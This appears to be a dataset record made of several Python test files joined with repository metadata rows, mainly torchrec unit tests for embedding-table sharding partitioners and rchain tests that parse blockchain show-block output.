mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="join(', ', a)",
)
]
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "foo a"},
{"c": "far a"},
{"c": "boo a"},
{"c": "bar a"},
]
| 25.789063 | 76 | 0.44017 | 1,031 | 9,903 | 4.106693 | 0.080504 | 0.022201 | 0.044166 | 0.054322 | 0.871752 | 0.867974 | 0.86136 | 0.816958 | 0.794757 | 0.787671 | 0 | 0.004683 | 0.374735 | 9,903 | 383 | 77 | 25.856397 | 0.679102 | 0 | 0 | 0.595016 | 0 | 0 | 0.152984 | 0 | 0 | 0 | 0 | 0 | 0.031153 | 1 | 0.031153 | false | 0 | 0.021807 | 0 | 0.05296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1c1814b5a74e0313eb5ba98a15453e36d07aa496 | 19,936 | py | Python | torchrec/distributed/planner/tests/test_partitioners.py | xing-liu/torchrec | 82ffde7a69fdb9c66b79a753d6f03afa5db3f73e | [
"BSD-3-Clause"
] | null | null | null | torchrec/distributed/planner/tests/test_partitioners.py | xing-liu/torchrec | 82ffde7a69fdb9c66b79a753d6f03afa5db3f73e | [
"BSD-3-Clause"
] | null | null | null | torchrec/distributed/planner/tests/test_partitioners.py | xing-liu/torchrec | 82ffde7a69fdb9c66b79a753d6f03afa5db3f73e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import copy
import unittest
from typing import cast, List
from torch import nn
from torchrec.distributed.embedding_types import EmbeddingComputeKernel
from torchrec.distributed.embeddingbag import EmbeddingBagCollectionSharder
from torchrec.distributed.planner.enumerators import EmbeddingEnumerator
from torchrec.distributed.planner.partitioners import GreedyPerfPartitioner
from torchrec.distributed.planner.types import (
ParameterConstraints,
PartitionByType,
PlannerError,
Storage,
Topology,
)
from torchrec.distributed.test_utils.test_model import TestSparseNN
from torchrec.distributed.types import ModuleSharder, ShardingType
from torchrec.modules.embedding_configs import EmbeddingBagConfig
class RWSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.ROW_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class TWSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.TABLE_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class TWRWSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.TABLE_ROW_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class TWCWSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.TABLE_COLUMN_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class HostLevelSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.TABLE_ROW_WISE.value, ShardingType.TABLE_COLUMN_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class TestGreedyPerfPartitioner(unittest.TestCase):
def setUp(self) -> None:
compute_device = "cuda"
self.topology = Topology(world_size=2, compute_device=compute_device)
tables = [
EmbeddingBagConfig(
num_embeddings=100 + i,
embedding_dim=10 + i,
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.topology = Topology(world_size=2, compute_device=compute_device)
self.model = TestSparseNN(tables=tables, weighted_tables=[])
self.enumerator = EmbeddingEnumerator(topology=self.topology)
self.partitioner = GreedyPerfPartitioner()
def test_tw_balanced_perf_device(self) -> None:
sharding_options = self.enumerator.enumerate(
module=self.model, sharders=[TWSharder()]
)
for sharding_option in sharding_options:
sharding_option.shards[0].perf = 100
sharding_option.shards[0].storage = Storage(hbm=1000, ddr=1000)
candidate_topology = copy.deepcopy(self.topology)
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=candidate_topology,
)
# pyre-ignore [16]
solution_topology = self.partitioner._topology
expected_ranks = {
"table_0": [0],
"table_1": [1],
"table_2": [0],
"table_3": [1],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
self.assertEqual(solution_topology.devices[0].perf, 200)
self.assertEqual(solution_topology.devices[1].perf, 200)
self.assertEqual(
solution_topology.devices[0].storage,
self.topology.devices[0].storage - Storage(2000, 2000),
)
self.assertEqual(
solution_topology.devices[1].storage,
self.topology.devices[1].storage - Storage(2000, 2000),
)
def test_tw_unbalanced_perf_device(self) -> None:
sharding_options = self.enumerator.enumerate(
module=self.model, sharders=[TWSharder()]
)
for i, sharding_option in enumerate(sharding_options):
perf = 100 if i > 0 else 300
sharding_option.shards[0].perf = perf
sharding_option.shards[0].storage = Storage(hbm=1000, ddr=1000)
candidate_topology = copy.deepcopy(self.topology)
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=candidate_topology,
)
# pyre-ignore[16]
solution_topology = self.partitioner._topology
expected_ranks = {
"table_0": [0],
"table_1": [1],
"table_2": [1],
"table_3": [1],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
self.assertEqual(solution_topology.devices[0].perf, 300)
self.assertEqual(solution_topology.devices[1].perf, 300)
self.assertEqual(
solution_topology.devices[0].storage,
self.topology.devices[0].storage - Storage(1000, 1000),
)
self.assertEqual(
solution_topology.devices[1].storage,
self.topology.devices[1].storage - Storage(3000, 3000),
)
def test_tw_balanced_perf_host(self) -> None:
self.topology = Topology(
world_size=16, local_world_size=8, compute_device="cuda"
)
tables = [
EmbeddingBagConfig(
num_embeddings=64,
embedding_dim=10 + i,
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables, weighted_tables=[])
self.enumerator = EmbeddingEnumerator(topology=self.topology)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model, sharders=[TWRWSharder()]
)
for sharding_option in sharding_options:
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.HOST.value
candidate_topology = copy.deepcopy(self.topology)
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=candidate_topology,
)
# pyre-ignore[16]
solution_topology = self.partitioner._topology
expected_ranks = {
"table_0": [0, 1, 2, 3, 4, 5, 6, 7],
"table_1": [8, 9, 10, 11, 12, 13, 14, 15],
"table_2": [0, 1, 2, 3, 4, 5, 6, 7],
"table_3": [8, 9, 10, 11, 12, 13, 14, 15],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
for i in range(self.topology.world_size):
self.assertEqual(
solution_topology.devices[i].storage,
# there are two shards allocated to each device
self.topology.devices[i].storage - Storage(2000, 2000),
)
self.assertEqual(solution_topology.devices[i].perf, 200)
def test_rw_unbalanced_perf_uniform(self) -> None:
self.topology = Topology(world_size=4, compute_device="cuda")
tables = [
EmbeddingBagConfig(
num_embeddings=64,
embedding_dim=10 + i,
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables, weighted_tables=[])
self.enumerator = EmbeddingEnumerator(topology=self.topology)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model, sharders=[RWSharder()]
)
for sharding_option in sharding_options:
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.UNIFORM.value
candidate_topology = copy.deepcopy(self.topology)
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=candidate_topology,
)
# pyre-ignore[16]
solution_topology = self.partitioner._topology
expected_ranks = {
"table_0": [0, 1, 2, 3],
"table_1": [0, 1, 2, 3],
"table_2": [0, 1, 2, 3],
"table_3": [0, 1, 2, 3],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
for i in range(self.topology.world_size):
self.assertEqual(
solution_topology.devices[i].storage,
self.topology.devices[i].storage - Storage(4000, 4000),
)
def test_twcw_unbalanced_perf_host(self) -> None:
self.topology = Topology(
world_size=16, local_world_size=8, compute_device="cuda"
)
constraints = {
"table_0": ParameterConstraints(min_partition=2),
"table_1": ParameterConstraints(min_partition=10),
"table_2": ParameterConstraints(min_partition=5),
"table_3": ParameterConstraints(min_partition=8),
}
tables = [
EmbeddingBagConfig(
num_embeddings=64,
embedding_dim=20 * (i + 1),
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables)
self.enumerator = EmbeddingEnumerator(
topology=self.topology, constraints=constraints
)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model,
sharders=[TWCWSharder()],
)
for sharding_option in sharding_options:
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.HOST.value
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=self.topology,
)
expected_ranks = {
"table_0": [8, 9, 10, 11, 12, 13, 14, 15, 8, 9],
"table_1": [4, 5, 6, 7],
"table_2": [0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3],
"table_3": [10, 11, 12, 13, 14, 15, 8, 9, 10, 11],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
def test_twrw_and_twcw_perf_host(self) -> None:
self.topology = Topology(
world_size=16, local_world_size=8, compute_device="cuda"
)
constraints = {
"table_0": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
"table_1": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=4
),
"table_2": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=7
),
"table_3": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
}
tables = [
EmbeddingBagConfig(
num_embeddings=128,
embedding_dim=20 * (i + 1),
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables)
self.enumerator = EmbeddingEnumerator(
topology=self.topology, constraints=constraints
)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model,
sharders=[HostLevelSharder()],
)
for sharding_option in sharding_options:
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.HOST.value
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=self.topology,
)
expected_ranks = {
"table_0": [8, 9, 10, 11, 12, 13, 14, 15],
"table_1": [0, 1, 2, 3, 4, 5, 6, 7, 0, 1],
"table_2": [8, 9, 10, 11, 12, 13, 14, 15],
"table_3": [0, 1, 2, 3, 4, 5, 6, 7],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
def test_twrw_and_twcw_cohost(self) -> None:
self.topology = Topology(
world_size=16, local_world_size=8, compute_device="cuda"
)
constraints = {
"table_0": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
"table_1": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=4
),
"table_2": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=7
),
"table_3": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
}
tables = [
EmbeddingBagConfig(
num_embeddings=128,
embedding_dim=20 * (i + 1),
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables)
self.enumerator = EmbeddingEnumerator(
topology=self.topology, constraints=constraints
)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model,
sharders=[HostLevelSharder()],
)
for i, sharding_option in enumerate(sharding_options):
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.HOST.value
if i <= 2:
sharding_option.dependency = "host_0"
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=self.topology,
)
expected_ranks = {
"table_0": [0, 1, 2, 3, 4, 5, 6, 7],
"table_1": [0, 1, 2, 3, 4, 5, 6, 7, 0, 1],
"table_2": [2, 3, 4, 5, 6, 7, 0, 1],
"table_3": [8, 9, 10, 11, 12, 13, 14, 15],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
# pyre-ignore [16]
solution_topology = self.partitioner._topology
for i in range(self.topology.world_size):
total_storage = Storage(0, 0)
total_perf = 0
for sharding_option in sharding_plan:
for shard in sharding_option.shards:
if shard.rank == i:
total_storage += cast(Storage, shard.storage)
total_perf += shard.perf
self.assertEqual(
solution_topology.devices[i].storage + total_storage,
self.topology.devices[i].storage,
)
self.assertEqual(solution_topology.devices[i].perf, total_perf)
def test_oom(self) -> None:
self.topology = Topology(
world_size=2, local_world_size=1, compute_device="cuda"
)
constraints = {
"table_0": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
"table_1": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=4
),
"table_2": ParameterConstraints(
sharding_types=[ShardingType.TABLE_COLUMN_WISE.value], min_partition=7
),
"table_3": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
}
tables = [
EmbeddingBagConfig(
num_embeddings=128,
embedding_dim=20 * (i + 1),
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables)
self.enumerator = EmbeddingEnumerator(
topology=self.topology, constraints=constraints
)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model,
sharders=[HostLevelSharder()],
)
for i, sharding_option in enumerate(sharding_options):
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(
# pyre-ignore [6]
hbm=self.topology.devices[0].storage.hbm / 2,
# pyre-ignore [6]
ddr=self.topology.devices[0].storage.ddr / 2,
)
sharding_option.partition_by = PartitionByType.HOST.value
if i <= 2:
sharding_option.dependency = "host_0"
with self.assertRaises(PlannerError):
self.partitioner.partition(
proposal=sharding_options,
storage_constraint=self.topology,
)
| 36.579817 | 88 | 0.591342 | 2,055 | 19,936 | 5.545012 | 0.089538 | 0.060202 | 0.031593 | 0.022115 | 0.866871 | 0.85441 | 0.835103 | 0.808337 | 0.798947 | 0.789381 | 0 | 0.03734 | 0.312199 | 19,936 | 544 | 89 | 36.647059 | 0.793684 | 0.019011 | 0 | 0.656587 | 0 | 0 | 0.022821 | 0 | 0 | 0 | 0 | 0 | 0.045356 | 1 | 0.041037 | false | 0 | 0.025918 | 0.021598 | 0.101512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1c3af52ea76f81bce8055804eeaef5872fe35d37 | 30 | py | Python | pybot/plugins/api/__init__.py | harikrishnana2021/operationcode-pybot | 6e78e069c274281d50dcb71b98b9f485afb012fc | [
"MIT"
] | null | null | null | pybot/plugins/api/__init__.py | harikrishnana2021/operationcode-pybot | 6e78e069c274281d50dcb71b98b9f485afb012fc | [
"MIT"
] | null | null | null | pybot/plugins/api/__init__.py | harikrishnana2021/operationcode-pybot | 6e78e069c274281d50dcb71b98b9f485afb012fc | [
"MIT"
] | null | null | null | from .plugin import APIPlugin
| 15 | 29 | 0.833333 | 4 | 30 | 6.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1c4f9119b59a7242e19b3d6447984e95f84a8d19 | 19,955 | py | Python | integration-tests/test/test_internal.py | guilhermehas/rchain | 3fd2a1924e828de18204ac100bff60a6090621e1 | [
"Apache-2.0"
] | null | null | null | integration-tests/test/test_internal.py | guilhermehas/rchain | 3fd2a1924e828de18204ac100bff60a6090621e1 | [
"Apache-2.0"
] | 7 | 2019-12-27T14:15:35.000Z | 2019-12-30T01:06:20.000Z | integration-tests/test/test_internal.py | woky/rchain | 76ba93f4349fa525eb08d0b3f1751c23e0de74e2 | [
"Apache-2.0"
] | null | null | null | """Tests for the testing code itself."""
from rchain.crypto import PrivateKey
from .conftest import (
make_wallets_file_lines,
)
from .utils import(
extract_block_hash_from_propose_output,
extract_block_count_from_show_blocks,
parse_show_blocks_output,
parse_show_block_output,
parse_mvdag_str,
extract_deploy_id_from_deploy_output,
)
def test_blocks_count_from_show_blocks() -> None:
show_blocks_output = '''------------- block 0 ---------------
blockHash: "1b69a62e5d4d57173efd918d828f3308f801a0867a22fc942b4a4775ae896958"
sender: ""
seqNum: 0
sig: ""
sigAlgorithm: ""
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1575005928241
headerExtraBytes: ""
blockNumber: 0
preStateHash: "6284b05545513fead17c469aeb6baa2a11ed5a86eeda57accaa3bb95d60d5250"
postStateHash: "de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865"
bodyExtraBytes: ""
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 15
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 20
}
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 60
}
blockSize: "192205"
deployCount: 11
faultTolerance: 0.2631579
-----------------------------------------------------
count: 22
'''
assert extract_block_count_from_show_blocks(show_blocks_output) == 22
def test_parse_show_blocks_output() -> None:
input = '''
------------- block 1 ---------------
blockHash: "91979d8509e6ff886d54475e7519f23631205957cb3396bb9d1e0371aa01b02a"
sender: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
seqNum: 1
sig: "304502210086fcc0e8e0cb391275196711f11705cddf6724498965b68a34705d3631290bed022012c661bc2102c61443ed7649dbdcf76aa35780153f90210ddf69a708467c5bbf"
sigAlgorithm: "secp256k1"
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1575009346798
headerExtraBytes: ""
parentsHashList: "2a7f8806968fb93f9a74e52502f5d7ac8f84c6a6bc303f692cb1b9e63bdca36c"
blockNumber: 1
preStateHash: "de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865"
postStateHash: "ce921313bee2afe2f20818931f0580b2fa86594eb8eaba3ff2bc3686d703e8b5"
bodyExtraBytes: ""
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 60
}
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 15
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 20
}
blockSize: "20939"
deployCount: 1
faultTolerance: 0.57894737
-----------------------------------------------------
------------- block 0 ---------------
blockHash: "2a7f8806968fb93f9a74e52502f5d7ac8f84c6a6bc303f692cb1b9e63bdca36c"
sender: ""
seqNum: 0
sig: ""
sigAlgorithm: ""
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1575008703176
headerExtraBytes: ""
blockNumber: 0
preStateHash: "6284b05545513fead17c469aeb6baa2a11ed5a86eeda57accaa3bb95d60d5250"
postStateHash: "de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865"
bodyExtraBytes: ""
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 15
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 20
}
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 60
}
blockSize: "192205"
deployCount: 11
faultTolerance: 1.0
-----------------------------------------------------
count: 2
'''
blocks = parse_show_blocks_output(input)
assert len(blocks) == 2
block1 = blocks[0]
assert block1.block_hash == '91979d8509e6ff886d54475e7519f23631205957cb3396bb9d1e0371aa01b02a'
assert block1.sender == '0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb'
assert block1.seq_num == 1
assert block1.sig == '304502210086fcc0e8e0cb391275196711f11705cddf6724498965b68a34705d3631290bed022012c661bc2102c61443ed7649dbdcf76aa35780153f90210ddf69a708467c5bbf'
assert block1.sig_algorithm == 'secp256k1'
assert block1.shard_id == 'rchain'
assert block1.extra_bytes == ''
assert block1.version == '1'
assert block1.timestamp == 1575009346798
assert block1.header_extra_bytes == ''
assert block1.parents == ['2a7f8806968fb93f9a74e52502f5d7ac8f84c6a6bc303f692cb1b9e63bdca36c']
assert block1.block_number == 1
assert block1.pre_state_hash == 'de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865'
assert block1.post_state_hash == 'ce921313bee2afe2f20818931f0580b2fa86594eb8eaba3ff2bc3686d703e8b5'
assert block1.body_extra_bytes == ''
assert block1.block_size == 20939
assert block1.deploy_count == 1
assert block1.fault_tolerance == 0.57894737
assert block1.bonds == {
'0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb': 60,
'04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35': 15,
'04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519': 20
}
block2 = blocks[1]
assert block2.block_hash == '2a7f8806968fb93f9a74e52502f5d7ac8f84c6a6bc303f692cb1b9e63bdca36c'
assert block2.sender == ''
assert block2.seq_num == 0
assert block2.sig == ''
assert block2.sig_algorithm == ''
assert block2.shard_id == 'rchain'
assert block2.extra_bytes == ''
assert block2.version == '1'
assert block2.timestamp == 1575008703176
assert block2.header_extra_bytes == ''
assert block2.parents == []
assert block2.block_number == 0
assert block2.pre_state_hash == '6284b05545513fead17c469aeb6baa2a11ed5a86eeda57accaa3bb95d60d5250'
assert block2.post_state_hash == 'de7e15efcdfd0018497bcb40104afc863613619c0e47d5b2bf18c0c6d9e53865'
assert block2.body_extra_bytes == ''
assert block2.block_size == 192205
assert block2.deploy_count == 11
assert block2.fault_tolerance == 1.0
assert block2.bonds == {
'0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb': 60,
'04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35': 15,
'04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519': 20
}
def test_parse_show_block_output() -> None:
input = r'''blockInfo {
blockHash: "b3e8560f42451ee20f62c3d3bf52d00aa12131876bdf4fb2ddb6ac80937edbaf"
sender: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
seqNum: 1
sig: "304502210086be15066503ab4cd0707f618e90eb65036eed374aa8f46c789939b93cc280c702201987cca65b56517e38629718063cb4e17f7dc07a35593ff27a19e58838b22fe8"
sigAlgorithm: "secp256k1"
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1574992953104
headerExtraBytes: ""
parentsHashList: "a0e9b7870112390da059ecf1d23636efb672a5e23aacb8ac9ade5cbd60ea394b"
parentsHashList: "a0e9b7870112390da059ecf1d23636efb672a5e23aacb8ac9ade5cbd60ea394c"
blockNumber: 1
preStateHash: "d602762105b18cbb30747979d860657f7dd3919791bdc5db237ece9c607933a8"
postStateHash: "62bfc991fdc775b92252548fe06ddecdff2be024120d149a9596b3f334d798f1"
bodyExtraBytes: ""
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 79
}
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 52
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 56
}
blockSize: "20939"
deployCount: 1
faultTolerance: -1.0
}
deploys {
deployer: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
term: "@0!(2)"
timestamp: 1574992934035
sig: "3045022100994d74bfdb230d2af95d2090e3d9cd9020eb9c70224c2285585ea0f9a3aa406c022017ed317fe3e721626a9a1dea1804b0aeea5c32b627495dbbc8458e07ae5c1605"
sigAlgorithm: "secp256k1"
phloPrice: 1
phloLimit: 100000
validAfterBlockNumber: -1
cost: 0
errored: false
systemDeployError: "Deploy payment failed: Insufficient funds"
}
'''
block = parse_show_block_output(input)
assert block.block_hash == 'b3e8560f42451ee20f62c3d3bf52d00aa12131876bdf4fb2ddb6ac80937edbaf'
assert block.sender == '04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519'
assert block.seq_num == 1
assert block.sig == '304502210086be15066503ab4cd0707f618e90eb65036eed374aa8f46c789939b93cc280c702201987cca65b56517e38629718063cb4e17f7dc07a35593ff27a19e58838b22fe8'
assert block.sig_algorithm == 'secp256k1'
assert block.shard_id == 'rchain'
assert block.extra_bytes == ''
assert block.version == '1'
assert block.timestamp == 1574992953104
assert block.header_extra_bytes == ''
assert block.block_number == 1
assert block.pre_state_hash == 'd602762105b18cbb30747979d860657f7dd3919791bdc5db237ece9c607933a8'
assert block.post_state_hash == '62bfc991fdc775b92252548fe06ddecdff2be024120d149a9596b3f334d798f1'
